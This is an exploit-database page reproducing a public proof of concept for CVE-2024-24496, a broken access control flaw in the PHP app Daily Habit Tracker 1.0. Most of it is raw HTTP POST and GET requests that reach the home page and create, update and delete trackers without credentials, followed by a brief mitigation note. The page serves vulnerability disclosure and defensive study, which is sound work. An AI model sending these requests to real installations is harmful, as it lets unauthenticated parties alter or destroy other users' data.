Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Daily Habit Tracker 1.0 - Broken Access Control - exploit.company
header-logo
Suggest Exploit
vendor:
Daily Habit Tracker
by:
Yevhenii Butenko
8.1
CVSS
CRITICAL
Broken Access Control
285
CWE
Product Name: Daily Habit Tracker
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-24496
CPE: a:daily_habit_tracker:1.0
Metasploit:
Other Scripts:
Platforms Tested: Debian
2024

Daily Habit Tracker 1.0 – Broken Access Control

The vulnerability of Broken Access Control allows unauthorized users to access the home page and perform operations like creating, updating, or deleting trackers without the need for credentials.

Mitigation:

To mitigate this vulnerability, it is crucial to implement proper access controls and authentication mechanisms to ensure that users are authorized only for the resources they are supposed to access.
Source

Exploit-DB raw data:

# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24496

### Broken Access Control:

> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.

### Affected Components:

> home.php, add-tracker.php, delete-tracker.php, update-tracker.php

### Description:

> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.

## Proof of Concept:

### Unauthenticated Access to Home page

> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.

### Create Tracker as Unauthenticated User

To create a tracker, use the following request:

```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```

### Update Tracker as Unauthenticated User

To update a tracker, use the following request:

```
POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
```

### Delete Tracker as Unauthenticated User:

To delete a tracker, use the following request:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.

Navigation

Suggest Exploit

Services By CQR